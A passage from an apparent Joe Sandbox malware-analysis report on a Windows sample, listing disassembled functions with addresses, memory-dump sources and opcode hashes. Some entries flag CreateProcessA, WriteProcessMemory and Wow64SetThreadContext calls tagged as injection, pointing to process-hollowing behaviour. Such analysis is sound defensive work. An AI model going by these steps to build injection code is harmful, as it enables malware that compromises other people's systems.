Function 02E162F0 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4122265630.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2e10000_3140, EUR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55192774c0fca53e2952333be0b02d6150e85aab24660c359da9f282e5b0e6e9
Instruction ID: d0bda43be9a0b40373426dc9d7418a1114cd154a6d26de857444dbcd39a849d4
Opcode Fuzzy Hash: 55192774c0fca53e2952333be0b02d6150e85aab24660c359da9f282e5b0e6e9
Instruction Fuzzy Hash: F02104317816118FC7169B2AC45852EB7A6FFC975A708947AE817CB394CF34CC02CB90

Function 02E128F0 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4122265630.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2e10000_3140, EUR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba90de30d4d3d7f5bec71e197d892c449deb84ee1bbdccd80ba62abaf42e5201
Instruction ID: 6e4a12da848ae7100434b5b2d961416e6db01ce229caac49d045010b9e53b95f
Opcode Fuzzy Hash: ba90de30d4d3d7f5bec71e197d892c449deb84ee1bbdccd80ba62abaf42e5201
Instruction Fuzzy Hash: 63219075A001159FCF14DF38C840AEE37A5EB9D268B50C06DE94E9B244DB38EA43CBD2

Function 02D4D044 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4121791035.0000000002D4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D4D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d4d000_3140, EUR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5932c9fed33bf4e82db0946ddb830f1b43e53e409c898a18a7acc43e8b3058aa
Instruction ID: 8279c7f66bc1b118b0fd29c16abcf19eeb134ddfad847c634a0f33c3e10cfc35
Opcode Fuzzy Hash: 5932c9fed33bf4e82db0946ddb830f1b43e53e409c898a18a7acc43e8b3058aa
Instruction Fuzzy Hash: 4C212671604204DFDB14DF24D9C4B26BBA6FB88314F30C5ADE8494B352CB7AE846CA61

Function 02E15649 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4122265630.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2e10000_3140, EUR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b500ed7b1bdbe063565913cae71e6d112ba71ec1eaa97531c58ffaba8e9dce79
Instruction ID: 4e1e90725edbe6d4244f9e459ec1b63b04ef4823ef1f2b0d700af24d78786520
Opcode Fuzzy Hash: b500ed7b1bdbe063565913cae71e6d112ba71ec1eaa97531c58ffaba8e9dce79
Instruction Fuzzy Hash: 0321FF316851489FCB029F24D848BAF3B62EB85319F009479F8068B354CB79CD61CBE1

Function 02E14285 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4122265630.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2e10000_3140, EUR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b788881af136e7e69e55028fae2f77415509d8864cdeee3b3b02b5888db6b4b4
Instruction ID: eb66e21a25e8e55e4b55a57f1346c1d1a10201a05f79c817ded3ca369b2da238
Opcode Fuzzy Hash: b788881af136e7e69e55028fae2f77415509d8864cdeee3b3b02b5888db6b4b4
Instruction Fuzzy Hash: 0A31C278E41208CFCB08DFA8E59489DBBF2FF49305B2090A9E819AB364D735AD45CF01

Function 02E19761 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4122265630.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2e10000_3140, EUR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afa674f2c1038171f337ddedcdaa05ef862429139041b2b14c1df16a87f85e37
Instruction ID: c2faab933e64ddfcdee8a8f27b55e83b9d2d59b89580d0d97a377c555903edc5
Opcode Fuzzy Hash: afa674f2c1038171f337ddedcdaa05ef862429139041b2b14c1df16a87f85e37
Instruction Fuzzy Hash: EE217A30E412489FDB05CFA5D964AEEBFB6EF48209F249469E411F62A1DB35D981CB20

Function 02E1AEF0 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4122265630.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2e10000_3140, EUR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ba6cad487bd780957d63c2fe879dbc61ef9f222517beaf271bcb0772236763d
Instruction ID: 89be3ba2f993827c8b3296d5b01459fd68df37b23285d5f8d33524962c9a67e0
Opcode Fuzzy Hash: 7ba6cad487bd780957d63c2fe879dbc61ef9f222517beaf271bcb0772236763d
Instruction Fuzzy Hash: 6911AF72B802089BCB109E56D848BEEBBB6FB8C315F549029E916E7350DB71AC50CB90

Function 02E1F658 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4122265630.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2e10000_3140, EUR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d662a59273c463e482cbd4c1696ab31e4a95adfc0f5acd6654bbb58cb4eb831
Instruction ID: 066e59a70a06c3a9a688f8eb09ee39563d748b3b93884b6aae16a778c439c572
Opcode Fuzzy Hash: 9d662a59273c463e482cbd4c1696ab31e4a95adfc0f5acd6654bbb58cb4eb831
Instruction Fuzzy Hash: F12138B0D002099FDB45DFA9D980A9EBFF2FB45304F10D5BAD018AB365EB385A458B81

Function 02E16300 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4122265630.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2e10000_3140, EUR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8666cf188e8c90a3ef8ceb1d73898de610201e58f29c50203390e46d72477e29
Instruction ID: 8f40bc5d8a9ec67588f84fe6256980833eb209429da9080afb6e97bc73a75500
Opcode Fuzzy Hash: 8666cf188e8c90a3ef8ceb1d73898de610201e58f29c50203390e46d72477e29
Instruction Fuzzy Hash: 0F11A5357815159FC7159A2AD45893E77AAFFC579A7098478E817CB360CF21DC02CB90

Function 02E127F0 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4122265630.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2e10000_3140, EUR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 000fff2a3fb0fd4b49046d6db8d31d6a57aea443e9c97cacda71868f1c7119ad
Instruction ID: 63b87c4dfc3857e368254c2d5ad6361b6033f51060f72646502fa368795a660f
Opcode Fuzzy Hash: 000fff2a3fb0fd4b49046d6db8d31d6a57aea443e9c97cacda71868f1c7119ad
Instruction Fuzzy Hash: 3321F274D8420E8FCB00EFA9D8485EEBBF4EF09310F4055AAD805B3210EB345A95CBA1

Function 02E1F668 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4122265630.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2e10000_3140, EUR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5138b9d3eb7cde8eb53e86b06b145d8849ae74a9ea9a69eb7b2bfc1edf2a1de9
Instruction ID: 0c33b785909ec547f67408463e2d4686550b72c965fc000e7f8128bc60c7fe02
Opcode Fuzzy Hash: 5138b9d3eb7cde8eb53e86b06b145d8849ae74a9ea9a69eb7b2bfc1edf2a1de9
Instruction Fuzzy Hash: D7113A70D402099FDB45EFA9D580B9EBBF2FB44304F10D5B9D018AB365EB385E458B81

Function 02D4D03F Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4121791035.0000000002D4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D4D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d4d000_3140, EUR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction ID: 748a0a802c16e2067b7d0ba854356016e898f82f381fe2762a8f8a2994cca517
Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction Fuzzy Hash: F311BB75504284CFCB11CF10C9C4B16BBA2FB88318F24C6AED8494B352C73AE84ACB62

Function 02E15E98 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4122265630.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2e10000_3140, EUR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a16fe4eeb3cc152232500b484d3e1ab6a55837f732e22c28d7db68731211318
Instruction ID: 5dd8f40ab3845535e4fdb6c24f719c4507db584225f062787903f36edeaad89e
Opcode Fuzzy Hash: 4a16fe4eeb3cc152232500b484d3e1ab6a55837f732e22c28d7db68731211318
Instruction Fuzzy Hash: 8001D432B801186BCB429E59D854BEF3BABEBC8751F54C02AF906D7280DE358D11DB94

Function 02E1ABE0 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4122265630.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2e10000_3140, EUR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd025ce7955f72e9a76363620ca8a458ae6789cf4ae2f192c700be6ddc6264fd
Instruction ID: 45c2fe802ccbc900b45d74d9b3085b1a286a4e174f00e6f9269ec2e03c35a56f
Opcode Fuzzy Hash: fd025ce7955f72e9a76363620ca8a458ae6789cf4ae2f192c700be6ddc6264fd
Instruction Fuzzy Hash: B9F0F6317816144B87159A2F9458ABAB6DEEFC9A5D745907AE809C7361EF20CC03C380

Function 02E1E8E8 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4122265630.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2e10000_3140, EUR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8c996a6807720662ef3083f4b78ddbfb8802431589157c13e15f7f1de368606
Instruction ID: cda51dfaf5335e48fd6ced13b1bf27cf0a6a988550bff8a941ccd1afd1a5737a
Opcode Fuzzy Hash: d8c996a6807720662ef3083f4b78ddbfb8802431589157c13e15f7f1de368606
Instruction Fuzzy Hash: 7601E574E0020AEFDB40DFA8E845AAEBBB1FB48304F408565E914B3350D7386E56DF92

Function 02E128A2 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4122265630.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2e10000_3140, EUR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cebfdfe048716e4d8282409f82fb73c380dd559d662de6441eb9c11021ccd74e
Instruction ID: b25c449287cfb457d2db0e8291424d2412ecfc337307517f6bf9d95cae056832
Opcode Fuzzy Hash: cebfdfe048716e4d8282409f82fb73c380dd559d662de6441eb9c11021ccd74e
Instruction Fuzzy Hash: D0E0D831E943578BC701E7F09C140FEBB349D92121B48455BC0A537050EB20225AC3A2

Function 02E128B0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4122265630.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2e10000_3140, EUR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab83175bc5d23b5ae51e1abf94a950a73317b27adc236c87e95ac6507a01be51
Instruction ID: 38500f3bade9f6392afe9a83f925e0f025d31839c3fe1b8d4446b912d8b1d3f2
Opcode Fuzzy Hash: ab83175bc5d23b5ae51e1abf94a950a73317b27adc236c87e95ac6507a01be51
Instruction Fuzzy Hash: 72D01231D2022A578B00AAA5DC044EEB738EE95665B504626D55437140EB70665986A2

Function 02E16739 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4122265630.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2e10000_3140, EUR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f08b7cb697b6c1a766442961b07be80886f8de46347aed767dda5cf14b018a84
Instruction ID: a89b1a515f428e25a9379ec662ece339dd943cb708f02a27934cea0ffb3c5db9
Opcode Fuzzy Hash: f08b7cb697b6c1a766442961b07be80886f8de46347aed767dda5cf14b018a84
Instruction Fuzzy Hash: 5CD02E3009470D0FC742B770ED0E3A17B0AEB80200F408A30940A0A32ADFADA88886A0

Function 02E1D6D4 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4122265630.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2e10000_3140, EUR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90dc5bdeac33a92cf6892b5fa27ff2c74660635540dbede9a587a01fe6ef2b93
Instruction ID: 2c43c428a51ac28cbf2357a9624b031a5448ee8eeb2aa025678a9e69bcd05e71
Opcode Fuzzy Hash: 90dc5bdeac33a92cf6892b5fa27ff2c74660635540dbede9a587a01fe6ef2b93
Instruction Fuzzy Hash: A2D06735E8450DCBCF20DFA9E5984DCFB71EF59322F10543AD925A3251D63054A5CF11

Function 02E1AFAD Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4122265630.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2e10000_3140, EUR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a2d3c902dd9961ce61e56958a90f70bdf5122935909330f0f49f31c87385b02
Instruction ID: f887ca1d4f4299e14d7fbd833e2e3160e883cf5357967e21bf640121f61b79c8
Opcode Fuzzy Hash: 3a2d3c902dd9961ce61e56958a90f70bdf5122935909330f0f49f31c87385b02
Instruction Fuzzy Hash: 1DD0173AB40008DFCB008F89E8408DDF7B6FB98221B448017E911A3220C6319825CB50

Function 02E16748 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4122265630.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2e10000_3140, EUR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52bbe42c3c21e7f57ac6d650a3ed9b1a437a8c26f9e883e1a3ce4179adeb6e8b
Instruction ID: f4f2ac9f69e7c72ac1c6ab269fbfa97e6761b247ea80902a40c4b1b5a6b736bd
Opcode Fuzzy Hash: 52bbe42c3c21e7f57ac6d650a3ed9b1a437a8c26f9e883e1a3ce4179adeb6e8b
Instruction Fuzzy Hash: 77C012305843084FC641FBA5ED45555771EE780204F408930900B0676DDFBD5C894A90

Non-executed Functions

Function 02E1F979 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4122265630.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2e10000_3140, EUR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b29b1acc4ea4600fa75a1fba61ea9982ee45bf0f0dac0542d69a2a6d906a4c4
Instruction ID: daa4e9c7bce39728dbd2d70621a38723ba1e3dd4ff1b61fd1343c001eac8417d
Opcode Fuzzy Hash: 4b29b1acc4ea4600fa75a1fba61ea9982ee45bf0f0dac0542d69a2a6d906a4c4
Instruction Fuzzy Hash: 2DC1BE75E00218CFDB54DFA5C984B9DBBB2AF89304F1081A9D809BB364DB359E85CF51

Function 02E1F2D8 Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4122265630.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2e10000_3140, EUR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de1d84fc4102b108f9cadd34048b9caf139685bea1109e8a7fdccac88521e9bd
Instruction ID: ef784e9c6c7ba38da961edcaa4c1cb076ab96068f579ab51458e31f1886a808a
Opcode Fuzzy Hash: de1d84fc4102b108f9cadd34048b9caf139685bea1109e8a7fdccac88521e9bd
Instruction Fuzzy Hash: 7E512470D41208CBDB04EFA9D5887EDBBB2BB88304F14E139E405BB694DB799985CF94

Function 02E1F4C4 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4122265630.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2e10000_3140, EUR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc284bdc69723e8e8f2295d829a8ef33f1ad00120cc70e5419263296f22972a6
Instruction ID: 1aef0f33d5865430448d5450e5ef01c9fae1b8c41417aeb1ef1cba06fe6b322d
Opcode Fuzzy Hash: dc284bdc69723e8e8f2295d829a8ef33f1ad00120cc70e5419263296f22972a6
Instruction Fuzzy Hash: A9510370D81208CBDB14EFA8D5847EDBBB2FB48305F20E129E415BB695C7399982CF90

Function 02E16920 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;^q, xrefs: 02E1695E
\;^q, xrefs: 02E16936
\;^q, xrefs: 02E1692C
\;^q, xrefs: 02E16952

Memory Dump Source

Source File: 00000008.00000002.4122265630.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2e10000_3140, EUR.jbxd

Similarity

API ID:
String ID: \;^q$\;^q$\;^q$\;^q
API String ID: 0-3001612457
Opcode ID: ed10988b7446d8871df9e8d10b9de468bac63f1b0f325a25a37f744f192e0238
Instruction ID: 6897f68eba9113f53eaa5c9a06b63e127498fb641a9791ec5cc98bcc67caa160
Opcode Fuzzy Hash: ed10988b7446d8871df9e8d10b9de468bac63f1b0f325a25a37f744f192e0238
Instruction Fuzzy Hash: C8017C31B801159FCB6C8E2DC544A2577EFAF88A68725D5BAE446CF3B8DA31DC41C790

Analysis Process: lkuPOyvaWlIu.exePID: 7276, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	9.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	82
Total number of Limit Nodes:	2

Executed Functions

Function 04FF1709 Relevance: 6.1, APIs: 4, Instructions: 136
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 04FF1796
GetCurrentThread.KERNEL32 ref: 04FF17D3
GetCurrentProcess.KERNEL32 ref: 04FF1810
GetCurrentThreadId.KERNEL32 ref: 04FF1869

Memory Dump Source

Source File: 00000009.00000002.1806001613.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4ff0000_lkuPOyvaWlIu.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: e2432c7b9e06c886c74c74e777f863215653e43c81424fe013f6929ea624d9b8
Instruction ID: 0e77a983648be040e039c6aae0cb65e6cf07a3594ec7cf90912a80922aedfa72
Opcode Fuzzy Hash: e2432c7b9e06c886c74c74e777f863215653e43c81424fe013f6929ea624d9b8
Instruction Fuzzy Hash: 375175B4900249CFEB14DFA9DA48BDEBBF1EF48304F208469D019A7361DB35A945CF66

Function 04FF1718 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 04FF1796
GetCurrentThread.KERNEL32 ref: 04FF17D3
GetCurrentProcess.KERNEL32 ref: 04FF1810
GetCurrentThreadId.KERNEL32 ref: 04FF1869

Memory Dump Source

Source File: 00000009.00000002.1806001613.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4ff0000_lkuPOyvaWlIu.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 79df4513585366ef98dbf4c3d8c0a92ed154da7d9667bbffc60e11a62d27aa75
Instruction ID: f6371d56511fabecc3b5ad27524209d60629c5a48938ec0f378b2dba08252c82
Opcode Fuzzy Hash: 79df4513585366ef98dbf4c3d8c0a92ed154da7d9667bbffc60e11a62d27aa75
Instruction Fuzzy Hash: 8B5167B4900209CFDB14DFAADA48BDEBBF1EF48314F208469D419A7360D735A945CF66

Function 0763EED0 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0763F106

Memory Dump Source

Source File: 00000009.00000002.1807209948.0000000007630000.00000040.00000800.00020000.00000000.sdmp, Offset: 07630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7630000_lkuPOyvaWlIu.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 55f93d321bf59cbd76211ad7581757931ee455c4c3dc1fc16b4a963e838a442a
Instruction ID: c650d7fea62acdea48e3e546eea02cd8fe62243d7757a6f6c2aa71dc02647300
Opcode Fuzzy Hash: 55f93d321bf59cbd76211ad7581757931ee455c4c3dc1fc16b4a963e838a442a
Instruction Fuzzy Hash: F5915DB1D0021ADFDB10DF68C841BDEBBB2FF48314F1485A9E849A7250DB759985CF92

Function 0763EECF Relevance: 1.7, APIs: 1, Instructions: 241
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0763F106

Memory Dump Source

Source File: 00000009.00000002.1807209948.0000000007630000.00000040.00000800.00020000.00000000.sdmp, Offset: 07630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7630000_lkuPOyvaWlIu.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 03c45a5f75950e2c3eac862c0e3dd1e55951fbae8c9ebef9c33481ae14a5e1a0
Instruction ID: 2354257cc41363efe53ced85c489e773e546b879f61decb8bbf7469f3380be04
Opcode Fuzzy Hash: 03c45a5f75950e2c3eac862c0e3dd1e55951fbae8c9ebef9c33481ae14a5e1a0
Instruction Fuzzy Hash: 88915DB1D0021ADFDB10CFA8C941BEDBBB2BF48314F1485A9E849A7250DB759985CF92

Function 0108B86A Relevance: 1.7, APIs: 1, Instructions: 197
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0108BAC6

Memory Dump Source

Source File: 00000009.00000002.1802663033.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1080000_lkuPOyvaWlIu.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 880cd1df90a941968cb8bfc0319341b45384c7306b7329c228ebbf1db63f80a2
Instruction ID: 0f5816c1f77dd3a382975415038e2ac9a6da77c834632bd9beec3326fff8bd35
Opcode Fuzzy Hash: 880cd1df90a941968cb8bfc0319341b45384c7306b7329c228ebbf1db63f80a2
Instruction Fuzzy Hash: AE813370A04B058FDB64EF29D44079ABBF1FF88300F148A6DD4CA9BA50DB75E949CB91

Function 0763EC48 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0763ECD8

Memory Dump Source

Source File: 00000009.00000002.1807209948.0000000007630000.00000040.00000800.00020000.00000000.sdmp, Offset: 07630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7630000_lkuPOyvaWlIu.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: ff454f5188bee2d7996d9d5c0bf3f11e4b053bea422a40b001953b86b9dc0196
Instruction ID: 0aced658aba62fdc6656a6a212d3653163deb50bf14ea43daf9f91c78e6d52ce
Opcode Fuzzy Hash: ff454f5188bee2d7996d9d5c0bf3f11e4b053bea422a40b001953b86b9dc0196
Instruction Fuzzy Hash: 112166B19003599FCB10CFA9C885BDEBBF5FF88310F10842AE919A7240C779A944CFA4

Function 0763EC47 Relevance: 1.6, APIs: 1, Instructions: 67
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0763ECD8

Memory Dump Source

Source File: 00000009.00000002.1807209948.0000000007630000.00000040.00000800.00020000.00000000.sdmp, Offset: 07630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7630000_lkuPOyvaWlIu.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 7a4578d6638f11bf1f3902d93db5b87be1d2cc64473c41a2e913e46e190e2354
Instruction ID: 5bcc8747b6f54fb68122614980f8216ae31b23aa374d4a21aebda78f880c3b65
Opcode Fuzzy Hash: 7a4578d6638f11bf1f3902d93db5b87be1d2cc64473c41a2e913e46e190e2354
Instruction Fuzzy Hash: AC2125B59003599FCB10CFA9C985BEEBBF1FF48310F10882AE959A7250D7799944CFA4

Function 04FF1D64 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 04FF1DEF

Memory Dump Source

Source File: 00000009.00000002.1806001613.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4ff0000_lkuPOyvaWlIu.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 75b162161967c453c684dd606173f9102efaa1914273c3ee51fbc81888dfb350
Instruction ID: 53466963b9dc63e4c3499499d0b2ac542536dcb59d7be156fd363bf1626e1148
Opcode Fuzzy Hash: 75b162161967c453c684dd606173f9102efaa1914273c3ee51fbc81888dfb350
Instruction Fuzzy Hash: 4D21E3B5900248EFDB10CFA9D984ADEBBF4EF48320F14841AE958A7310D378A945CFA5

Function 0763E670 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0763E6F6

Memory Dump Source

Source File: 00000009.00000002.1807209948.0000000007630000.00000040.00000800.00020000.00000000.sdmp, Offset: 07630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7630000_lkuPOyvaWlIu.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 0139a8dcd074be218263e0b8d9eb4342a950ae3c460c306d212f1aad229bbf63
Instruction ID: e16baf488c78764fb529d8109b12d553ea3440db4b2c1d89a3d765f6fcadb723
Opcode Fuzzy Hash: 0139a8dcd074be218263e0b8d9eb4342a950ae3c460c306d212f1aad229bbf63
Instruction Fuzzy Hash: D2216AB19002098FDB10DFA9C5857EEBBF1EF88324F14842AD459B7280C7789584CFA4

Function 0763E678 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0763E6F6

Memory Dump Source

